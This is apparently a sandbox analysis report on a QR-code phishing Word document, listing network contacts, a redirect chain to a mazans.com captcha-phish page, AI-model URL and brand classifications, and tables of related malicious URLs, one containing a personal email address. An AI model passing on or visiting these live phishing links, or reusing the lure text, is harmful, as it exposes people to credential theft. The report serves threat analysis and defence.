                                                                                                                                                                                                                                                                                          scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                                                          192.28.147.68
                                                                                                                                                                                                                                                                                          294-tkb-300.mktoresp.comUnited States
                                                                                                                                                                                                                                                                                          53580MARKETOUSfalse
                                                                                                                                                                                                                                                                                          35.160.151.220
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          150.171.28.10
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                          3.248.162.96
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          142.250.186.98
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                          185.89.210.141
                                                                                                                                                                                                                                                                                          unknownGermany
                                                                                                                                                                                                                                                                                          29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                          34.251.101.162
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          151.101.1.140
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                          3.219.22.30
                                                                                                                                                                                                                                                                                          heapanalytics.comUnited States
                                                                                                                                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                          216.58.206.68
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                          150.171.27.10
                                                                                                                                                                                                                                                                                          ax-0001.ax-msedge.netUnited States
                                                                                                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                          142.250.181.226
                                                                                                                                                                                                                                                                                          googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                          162.241.85.172
                                                                                                                                                                                                                                                                                          mazans.comUnited States
                                                                                                                                                                                                                                                                                          26337OIS1USfalse
                                                                                                                                                                                                                                                                                          104.26.4.39
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                          34.168.114.70
                                                                                                                                                                                                                                                                                          r.neurotags.netUnited States
                                                                                                                                                                                                                                                                                          2686ATGS-MMD-ASUStrue
                                                                                                                                                                                                                                                                                          157.240.253.1
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                                                          142.250.186.164
                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                          44.234.198.184
                                                                                                                                                                                                                                                                                          api.segment.ioUnited States
                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                          151.101.129.140
                                                                                                                                                                                                                                                                                          dualstack.reddit.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                          142.250.185.98
                                                                                                                                                                                                                                                                                          td.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                                                                          192.168.2.6
                                                                                                                                                                                                                                                                                          192.168.2.17
                                                                                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                          Analysis ID:1555285
                                                                                                                                                                                                                                                                                          Start date and time:2024-11-13 17:28:18 +01:00
                                                                                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                          Overall analysis duration:0h 5m 34s
                                                                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                          Number of analysed new started processes analysed:24
                                                                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                          Sample name:Pmendon.ext_Reord_Adjustment.docx
                                                                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                                                                          Classification:mal56.phis.winDOCX@24/414@173/52
                                                                                                                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                                                                                          • Found application associated with file extension: .docx
                                                                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, TextInputHost.exe, svchost.exe
                                                                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.28.47, 52.113.194.132, 87.248.205.0, 52.111.236.35, 52.111.236.34, 52.111.236.33, 52.111.236.32, 172.217.16.195, 142.250.186.78, 142.250.110.84, 34.104.35.123, 20.189.173.11, 2.18.64.92, 2.18.64.99, 184.28.89.29, 151.101.193.91, 151.101.129.91, 151.101.65.91, 151.101.1.91, 2.18.64.220, 2.18.64.211, 142.250.185.136, 2.18.64.90, 2.18.64.86, 88.221.110.136, 88.221.110.227, 142.250.181.232, 104.102.43.106, 95.101.111.184, 95.101.111.170, 162.159.152.17, 162.159.153.247, 13.107.42.14, 172.217.18.14, 142.250.186.99, 142.250.185.67, 142.250.186.106, 216.58.212.170, 172.217.18.106, 142.250.74.202, 142.250.186.42, 172.217.16.138, 142.250.186.170, 216.58.206.74, 142.250.186.138, 172.217.18.10, 142.250.181.234, 216.58.206.42, 172.217.16.202, 142.250.184.202, 142.250.186.74, 142.250.184.234, 104.18.41.41, 172.64.146.215, 142.250.184.227, 23.96.124.68, 142.250.185.227, 13.74.129.1, 13.107.21.237, 204.79.197.237, 142.250.186.131, 142.250.185.78
                                                                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, cn-assets.adobedtm.com.edgekey.net, clientservices.googleapis.com, e10776.b.akamaiedge.net, a1847.dscg2.akamai.net, l-0005.l-msedge.net, clients2.google.com, onedscolprdwus10.westus.cloudapp.azure.com, login.live.com, update.googleapis.com, officeclient.microsoft.com, www.gstatic.com, ukw-azsc-config.officeapps.live.com, wu-b-net.trafficmanager.net, clarity-ingest-eus-c-sc.eastus.cloudapp.azure.com, www.google-analytics.com, www.bing.com, ecs.office.com, fs.microsoft.com, content-autofill.googleapis.com, c-bing-com.dual-a-0034.a-msedge.net, j2.6sc.co.edgekey.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, od.linkedin.edgesuite.net, uks-azsc-000.roaming.officeapps.live.com, nleditor.osi.office.net, www.linkedin.com.cdn.cloudflare.net, edgedl.me.gvt1.com, s-0005.s-msedge.net, c.bing.com, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, clients.l.google.com, a1916.dscg2.akamai.net, europe.configsvc1
                                                                                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                          • VT rate limit hit for: Pmendon.ext_Reord_Adjustment.docx
                                                                                                                                                                                                                                                                                          No simulations
                                                                                                                                                                                                                                                                                          SourceURL
                                                                                                                                                                                                                                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Pmendon.ext+goeasy.com
                                                                                                                                                                                                                                                                                          InputOutput
                                                                                                                                                                                                                                                                                          URL: Model: claude-3-5-sonnet-latest
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                              "typosquatting": false,
                                                                                                                                                                                                                                                                                              "unusual_query_string": false,
                                                                                                                                                                                                                                                                                              "suspicious_tld": false,
                                                                                                                                                                                                                                                                                              "ip_in_url": false,
                                                                                                                                                                                                                                                                                              "long_subdomain": false,
                                                                                                                                                                                                                                                                                              "malicious_keywords": false,
                                                                                                                                                                                                                                                                                              "encoded_characters": false,
                                                                                                                                                                                                                                                                                              "redirection": false,
                                                                                                                                                                                                                                                                                              "contains_email_address": false,
                                                                                                                                                                                                                                                                                              "known_domain": false,
                                                                                                                                                                                                                                                                                              "brand_spoofing_attempt": false,
                                                                                                                                                                                                                                                                                              "third_party_hosting": false
                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                          URL: https://mazans.com
                                                                                                                                                                                                                                                                                          URL: Office document Model: claude-3-haiku-20240307
                                                                                                                                                                                                                                                                                          ```json
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                            "contains_trigger_text": true,
                                                                                                                                                                                                                                                                                            "trigger_text": "Access your secure document by scanning the QR code below with your smartphone. This will take you directly to the document review page.",
                                                                                                                                                                                                                                                                                            "prominent_button_name": "unknown",
                                                                                                                                                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                                                                                                                                                            "has_urgent_text": true,
                                                                                                                                                                                                                                                                                            "has_visible_qrcode": true
                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                          URL: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTED Model: claude-3-haiku-20240307
                                                                                                                                                                                                                                                                                          ```json
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                            "contains_trigger_text": false,
                                                                                                                                                                                                                                                                                            "trigger_text": "unknown",
                                                                                                                                                                                                                                                                                            "prominent_button_name": "unknown",
                                                                                                                                                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                          URL: Office document Model: claude-3-haiku-20240307
                                                                                                                                                                                                                                                                                          ```json
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                            "brands": [
                                                                                                                                                                                                                                                                                              "Goeasy"
                                                                                                                                                                                                                                                                                            ]
                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                          URL: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTED Model: claude-3-haiku-20240307
                                                                                                                                                                                                                                                                                          ```json
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                            "brands": [
                                                                                                                                                                                                                                                                                              "Twilio",
                                                                                                                                                                                                                                                                                              "Sendgrid"
                                                                                                                                                                                                                                                                                            ]
                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                          URL: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTED Model: claude-3-haiku-20240307
                                                                                                                                                                                                                                                                                          ```json
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                            "contains_trigger_text": false,
                                                                                                                                                                                                                                                                                            "trigger_text": "unknown",
                                                                                                                                                                                                                                                                                            "prominent_button_name": "unknown",
                                                                                                                                                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                          URL: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTED Model: claude-3-haiku-20240307
                                                                                                                                                                                                                                                                                          ```json
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                            "brands": [
                                                                                                                                                                                                                                                                                              "Twilio",
                                                                                                                                                                                                                                                                                              "Sendgrid"
                                                                                                                                                                                                                                                                                            ]
                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                          91.228.74.166http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                            https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                              https://axieu.com/terma/GeHDLfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                Sampension-file-846845087.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                  https://issuu.com/mathildagr/docs/pmd9746827?fr=sZTMyNjc4NzAyNzMGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFmiRUl-2BtxcZ73D3PC6s7dEdSEpNEVf7BmEr33HzpWyzDy2Qc_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZML5SAWON4OCquRGeOrZOG6X7bKIH2ouDi7O5ssZhkwdV9j8BuAetGO74HzivTb4yjw5AGX5ZMnsGYBS3vBuNNgFYRVSYVxc5dN7eCLDUr43XjgYUZE2GmJzXmN-2BelIHWKsvaOOIeqiW6cnMf2CI6MeEhodwtV2LpZJtWZhkGi5I2rlc08PnxbPlMsOj2Cr9oC-2BCWb9WuPqmZU8rqYD8CNL-2BgY3UElGOq-2BfG3NfYFdrc0Rb11eU0t5G2ihyqzzZVfI-3D#cHNjaG1pdHRAZ3Jpc3Qub3JnGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      http://199.59.243.227Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                        Salary_Structure_Benefits_for_Sebastien.daveauIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                          https://linkednnn.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            https://zupimages.net/up/24/42/ol13.jpg?d6mSMvU0ZvpGwffnuqPHYMR7NvlxIzVjDfTD4YJjdRSCOccGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                              18.244.18.112https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                https://resetnowjunocarecentermaijunonew.square.site/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  https://att-103454.square.site/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                      https://btinternet-102307.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                        https://att-100184.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                          https://att-service-106132.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                            https://shaw-101329.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                              https://btinternet-107377.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                https://juno-message-center-101610.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  91.228.74.200https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#&lt;EMAIL&gt;Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    EXT__Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                      https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                        https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                          Sampension-file-846845087.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                            Cursor Commander.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                              https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18Get hashmaliciousLiteHTTP BotBrowse
                                                                                                                                                                                                                                                                                                                                                https://isu.pub/Mzk5MDcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                  https://t.co/WUjzOGRMNxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                    https://issuu.com/mathildagr/docs/pmd9746827?fr=sZTMyNjc4NzAyNzMGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                      18.66.102.15https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                        https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFmiRUl-2BtxcZ73D3PC6s7dEdSEpNEVf7BmEr33HzpWyzDy2Qc_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZML5SAWON4OCquRGeOrZOG6X7bKIH2ouDi7O5ssZhkwdV9j8BuAetGO74HzivTb4yjw5AGX5ZMnsGYBS3vBuNNgFYRVSYVxc5dN7eCLDUr43XjgYUZE2GmJzXmN-2BelIHWKsvaOOIeqiW6cnMf2CI6MeEhodwtV2LpZJtWZhkGi5I2rlc08PnxbPlMsOj2Cr9oC-2BCWb9WuPqmZU8rqYD8CNL-2BgY3UElGOq-2BfG3NfYFdrc0Rb11eU0t5G2ihyqzzZVfI-3D#cHNjaG1pdHRAZ3Jpc3Qub3JnGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                          https://fromsmash.com/8A4OM5kRFs-etGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                            https://zupimages.net/up/24/42/ol13.jpg?d6mSMvU0ZvpGwffnuqPHYMR7NvlxIzVjDfTD4YJjdRSCOccGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                              https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                  https://issuu.com/ryanrodger/docs/smn8263528?fr=sMTQ5NTc4NTgxNDcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                    https://shaw-104901.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                      https://resetnowjunocarecentermaijunonew.square.site/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                        http://ogp.me/ns#Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                                          global.px.quantserve.comhttps://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#&lt;EMAIL&gt;Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          EXT__Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.159
                                                                                                                                                                                                                                                                                                                                                                          https://axieu.com/terma/GeHDLfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.244
                                                                                                                                                                                                                                                                                                                                                                          Sampension-file-846845087.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Cursor Commander.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18Get hashmaliciousLiteHTTP BotBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.244
                                                                                                                                                                                                                                                                                                                                                                          https://issuu.com/onlinedocumentpdf/docs/documentation?fr=xKAE9_zU1NQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 91.228.74.159
                                                                                                                                                                                                                                                                                                                                                                          jscloud.nethttps://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Sampension-file-846845087.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFmiRUl-2BtxcZ73D3PC6s7dEdSEpNEVf7BmEr33HzpWyzDy2Qc_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZML5SAWON4OCquRGeOrZOG6X7bKIH2ouDi7O5ssZhkwdV9j8BuAetGO74HzivTb4yjw5AGX5ZMnsGYBS3vBuNNgFYRVSYVxc5dN7eCLDUr43XjgYUZE2GmJzXmN-2BelIHWKsvaOOIeqiW6cnMf2CI6MeEhodwtV2LpZJtWZhkGi5I2rlc08PnxbPlMsOj2Cr9oC-2BCWb9WuPqmZU8rqYD8CNL-2BgY3UElGOq-2BfG3NfYFdrc0Rb11eU0t5G2ihyqzzZVfI-3D#cHNjaG1pdHRAZ3Jpc3Qub3JnGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                          • 104.26.4.39
